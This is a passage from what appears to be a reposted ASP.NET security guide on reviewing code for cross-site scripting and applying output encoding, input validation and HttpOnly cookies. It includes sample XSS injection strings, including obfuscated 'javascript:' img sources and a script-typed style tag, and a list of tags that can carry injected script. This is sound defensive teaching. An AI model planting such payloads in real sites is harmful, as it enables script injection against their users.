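            "Response.Write(Request.QueryString[\"username\"]);\n" +
            "Response.Write(\n  Request.Cookies[\"name\"].Values[\"name\"]);\n" +
            "Response.Write(AntiXSS.HtmlEncode(Request.Form[\"name\"]));\n" +
            "Response.Write(\"Done\");\n" +
            "<p><%= Session[\"name\"] %></p>\n";
        foreach (string finding in Review(sample)) Console.WriteLine(finding);
    }
}
```

Each reported line is a candidate for the countermeasures in Step 5; a statement that writes a local variable still needs a manual trace back to its source.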

Step 4. Review Potentially Dangerous HTML Tags and Attributes
If you dynamically create HTML tags and construct tag attributes with potentially unsafe input, make sure you HTML-encode the tag attributes before writing them out.

The following .aspx page shows how you can write HTML directly to the return page by using the <asp:Literal> control. The code takes user input of a color name, inserts it into the HTML sent back, and displays text in the color entered. The page uses HtmlEncode to ensure the inserted text is safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <form id="form1" runat="server">
    <div>
      Color:&nbsp;<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox><br />
      <asp:Button ID="Button1" runat="server" Text="Show color"
         OnClick="Button1_Click" /><br />
      <asp:Literal ID="Literal1" runat="server"></asp:Literal>
    </div>
  </form>
</html>

<script runat="server">
  protected void Button1_Click(object sender, EventArgs e)
  {
    // Encode the user-supplied color before placing it in the style attribute
    Literal1.Text = @"<span style=""color:"
      + Server.HtmlEncode(TextBox1.Text)
      + @""">Color example</span>";
  }
</script>

Potentially Dangerous HTML Tags

While not an exhaustive list, the following commonly used HTML tags could allow a malicious user to inject script code:

<applet>
<body>
<embed>
<frame>
<script>
<frameset>
<html>
<iframe>
<img>
<style>
<layer>
<link>
<ilayer>
<meta>
<object>

An attacker can use HTML attributes such as src, lowsrc, style, and href in conjunction with the preceding tags to inject cross-site scripting. For example, the src attribute of the <img> tag can be a source of injection, as shown in the following examples.

<img src="javascript:alert('hello');">
<img src="java&#010;script:alert('hello');">
<img src="java&#X0A;script:alert('hello');">

An attacker can also use the <style> tag to inject a script by changing the MIME type as shown in the following.

<style TYPE="text/javascript">
  alert('hello');
</style>

Step 5. Evaluate Countermeasures
When you find ASP.NET code that generates HTML using some input, you need to evaluate appropriate countermeasures for your specific application. Countermeasures include:

Encode HTML output.
Encode URL output.
Filter user input.

Encode HTML Output

If you write text output to a Web page and you do not know if the text contains HTML special characters (such as <, >, and &), pre-process the text by using the AntiXSS.HtmlEncode method as shown in the following code example. Do this if the text came from user input, a database, or a local file.

Response.Write(AntiXSS.HtmlEncode(Request.Form["name"]));

Do not substitute encoding output for checking that input is well-formed and correct. Use it as an additional security precaution.

Encode URL Output

If you return URL strings that contain input to the client, use the AntiXSS.UrlEncode method to encode these URL strings as shown in the following code example.

Response.Write(AntiXSS.UrlEncode(urlString));

Filter User Input

If you have pages that need to accept a range of HTML elements, for example through some kind of rich text input field, you must disable ASP.NET request validation for the page. If you have several pages that do this, create a filter that allows only the HTML elements that you want to accept. A common practice is to restrict formatting to safe HTML elements such as bold (<b>) and italic (<i>).

To safely allow restricted HTML input

Disable ASP.NET request validation by adding the ValidateRequest="false" attribute to the @Page directive.
Encode the string input with the HtmlEncode method.
Use a StringBuilder and call its Replace method to selectively remove the encoding on the HTML elements that you want to permit.

The following .aspx page code shows this approach. The page disables ASP.NET request validation by setting ValidateRequest="false". It HTML-encodes the input and then selectively allows the <b> and <i> HTML elements to support simple text formatting.

<%@ Page Language="C#" ValidateRequest="false"%>

<script runat="server">
  void submitBtn_Click(object sender, EventArgs e)
  {
    // Encode the string input
    StringBuilder sb = new StringBuilder(
                         AntiXSS.HtmlEncode(htmlInputTxt.Text));

    // Selectively allow <b> and <i>, restoring both opening and closing tags
    sb.Replace("&lt;b&gt;", "<b>");
    sb.Replace("&lt;/b&gt;", "</b>");
    sb.Replace("&lt;i&gt;", "<i>");
    sb.Replace("&lt;/i&gt;", "</i>");
    Response.Write(sb.ToString());
  }
</script>


<html>
  <body>
    <form id="form1" runat="server">
      <div>
        <asp:TextBox ID="htmlInputTxt" Runat="server"
                     TextMode="MultiLine" Width="318px"
                     Height="168px"></asp:TextBox>
        <asp:Button ID="submitBtn" Runat="server"
                     Text="Submit" OnClick="submitBtn_Click" />
      </div>
    </form>
  </body>
</html>

Additional Considerations

In addition to the techniques discussed previously in this How To, use the following countermeasures as further safeguards to prevent cross-site scripting:

Set the correct character encoding.
Do not rely on input sanitization.
Use the HttpOnly cookie option.
Use the <frame> security attribute.
Use the innerText property instead of innerHTML.

Set the Correct Character Encoding

To successfully restrict valid data for your Web pages, you should limit the ways in which the input data can be represented. This prevents malicious users from using canonicalization and multi-byte escape sequences to trick your input validation routines. A multi-byte escape sequence attack is a subtle manipulation that uses the fact that character encodings, such as Unicode Transformation Format-8 (UTF-8), use multi-byte sequences to represent non-ASCII characters. Some byte sequences are not legitimate UTF-8, but they may be accepted by some UTF-8 decoders, thus providing an exploitable security hole.

ASP.NET allows you to specify the character set at the page level or at the application level by using the <globalization> element in the Web.config file. The following code examples show both approaches and use the ISO-8859-1 character encoding, which is the default in early versions of HTML and HTTP.

To set the character encoding at the page level, use the <meta> element or the ResponseEncoding page-level attribute as follows:

<meta http-equiv="Content-Type"
      content="text/html; charset=ISO-8859-1" />
OR
<%@ Page ResponseEncoding="iso-8859-1" %>

To set the character encoding in the Web.config file, use the following configuration.

<configuration>
   <system.web>
      <globalization
         requestEncoding="iso-8859-1"
         responseEncoding="iso-8859-1"/>
   </system.web>
</configuration>
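
Where code does have to decode UTF-8 bytes itself, the illegitimate sequences described above can be rejected outright instead of being passed on to validation. This is an added example, not code from the original guidance; the class name is hypothetical and the byte sequences are constructed.

```csharp
using System;
using System.Text;

// Added example; StrictUtf8 is a hypothetical name.
public static class StrictUtf8
{
    // The second constructor argument (throwOnInvalidBytes) makes the decoder
    // raise an exception instead of substituting U+FFFD for malformed input.
    private static readonly UTF8Encoding Strict = new UTF8Encoding(false, true);

    public static bool TryDecode(byte[] raw, out string text)
    {
        try
        {
            text = Strict.GetString(raw);
            return true;
        }
        catch (DecoderFallbackException)
        {
            text = null;
            return false;
        }
    }

    public static void Main()
    {
        // Constructed byte sequences.
        byte[][] samples = {
            new byte[] { 0x52, 0x65, 0x6E, 0xC3, 0xA9, 0x65 }, // "Renée", well-formed
            new byte[] { 0xC0, 0xBC, 0x62, 0x3E },             // overlong form of '<', then "b>"
            new byte[] { 0x61, 0xE2, 0x82 }                    // truncated three-byte sequence
        };
        foreach (byte[] sample in samples)
        {
            string text;
            bool ok = TryDecode(sample, out text);
            Console.WriteLine(BitConverter.ToString(sample) + " -> "
                              + (ok ? "accepted: " + text : "rejected"));
        }
    }
}
```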

Validating Unicode Characters

Use the following code to validate Unicode characters in a page.

using System;
using System.Text.RegularExpressions;

public class WebForm1 : System.Web.UI.Page
{
  private void Page_Load(object sender, System.EventArgs e)
  {
    // A missing field is treated as empty input, which fails the check below
    string name = Request.Form["name"] ?? string.Empty;

    // Name must contain between 1 and 40 letters or spaces
    // and (optionally) special characters such as apostrophes
    // for names such as O'Dell
    if (!Regex.IsMatch(name,
               @"^[\p{L}\p{Zs}\p{Lu}\p{Ll}\']{1,40}$"))
      throw new ArgumentException("Invalid name parameter");

    // Use individual regular expressions to validate other parameters
  }
}

The following explains the regular expression shown in the preceding code:

^ means start looking at this position.
\p{ ..} matches any character in the named character class specified by {..}.
{L} matches any Unicode letter.
{Lu} matches uppercase letters.
{Ll} matches lowercase letters.
{Zs} matches space separators.
\' matches an apostrophe.
{1,40} specifies the number of characters: no less than 1 and no more than 40.
$ means stop looking at this position.

Do Not Rely on Input Sanitization

A common practice is for code to attempt to sanitize input by filtering out known unsafe characters. Do not rely on this approach because malicious users can usually find an alternative means of bypassing your validation. Instead, your code should check for known secure, safe input. Table 1 shows various safe ways to represent some common characters.

Table 1: Character Representation

Characters                    Decimal   Hexadecimal   HTML Character Set   Unicode
" (double quotation marks)    &#34      &#x22         &quot;               \u0022
' (single quotation mark)     &#39      &#x27         &apos;               \u0027
& (ampersand)                 &#38      &#x26         &amp;                \u0026
< (less than)                 &#60      &#x3C         &lt;                 \u003c
> (greater than)              &#62      &#x3E         &gt;                 \u003e

Use the HttpOnly Cookie Option

The HttpOnly cookie attribute prevents client-side scripts from accessing a cookie from the document.cookie property. Instead, the script returns an empty string. The cookie is still sent to the server whenever the user browses to a Web site in the current domain.
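
To confirm that the cookies a site issues actually carry the attribute, the Set-Cookie response headers can be audited. The following is an added example, not code from the original guidance; the class name is hypothetical and the header values are constructed.

```csharp
using System;
using System.Collections.Generic;

// Added example; CookieFlagAudit is a hypothetical name.
public static class CookieFlagAudit
{
    // Returns the names of cookies whose Set-Cookie value lacks the HttpOnly attribute.
    public static List<string> MissingHttpOnly(IEnumerable<string> setCookieValues)
    {
        List<string> missing = new List<string>();
        foreach (string header in setCookieValues)
        {
            string[] parts = header.Split(';');
            // parts[0] is the name=value pair; attributes start at index 1,
            // so a cookie whose value happens to be "HttpOnly" is not mistaken for the flag.
            string name = parts[0].Split('=')[0].Trim();
            bool httpOnly = false;
            for (int i = 1; i < parts.Length; i++)
            {
                // Attribute names are case-insensitive and HttpOnly carries no value.
                if (string.Equals(parts[i].Trim(), "HttpOnly",
                                  StringComparison.OrdinalIgnoreCase))
                    httpOnly = true;
            }
            if (!httpOnly) missing.Add(name);
        }
        return missing;
    }

    public static void Main()
    {
        // Constructed Set-Cookie header values.
        string[] headers = {
            "ASP.NET_SessionId=abc123; path=/; HttpOnly",
            "theme=dark; path=/",
            "auth=constructed-value; path=/; secure; httponly",
            "note=HttpOnly; path=/"
        };
        foreach (string name in MissingHttpOnly(headers))
            Console.WriteLine("missing HttpOnly: " + name);
    }
}
```

In ASP.NET the flag is set per cookie with the HttpCookie.HttpOnly property, or for every cookie the application issues with httpOnlyCookies="true" on the <httpCookies> element in Web.config.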

Use the <frame> Security Attribute

You can set the security attribute for the <frame> and <iframe> elements. You can use the security attribute to apply the user's Restricted Sites Internet Explorer security zone settings to an individual frame or iframe. By default, the Restricted Sites zone does not support script execution.

If you use the security attribute, it must be set to "restricted" as shown in the following.

<frame security="restricted" src="http://www.somesite.com/somepage.htm"></frame>

Use the innerText Property Instead of innerHTML

If you use the innerHTML property to build a page and the HTML is based on potentially untrusted input, you must use HtmlEncode to make it safe. To avoid having to remember to do this, use innerText instead. The innerText property renders content safe and ensures that scripts are not executed.

The following example shows this approach for two HTML <span> controls. The code in the Page_Load method sets the text displayed in the Welcome1 <span> element using the innerText property, so HTML-encoding is unnecessary. The code sets the text in the Welcome2 <span> element by using the innerHtml property; therefore, you must HtmlEncode it first to make it safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <body>
    <span id="Welcome1" runat="server"> </span>
    <span id="Welcome2" runat="server"> </span>
  </body>
</html>

<script runat="server">
  private void Page_Load(Object Src, EventArgs e)
  {
    // Using InnerText renders the content safe; no need to HtmlEncode
    Welcome1.InnerText = "Hello, " + User.Identity.Name;

    // Using InnerHtml requires the use of HtmlEncode to make it safe
    Welcome2.InnerHtml = "Hello, " +
                        Server.HtmlEncode(User.Identity.Name);
  }
</script>

Posted By आर्यावर्त 3:20 AM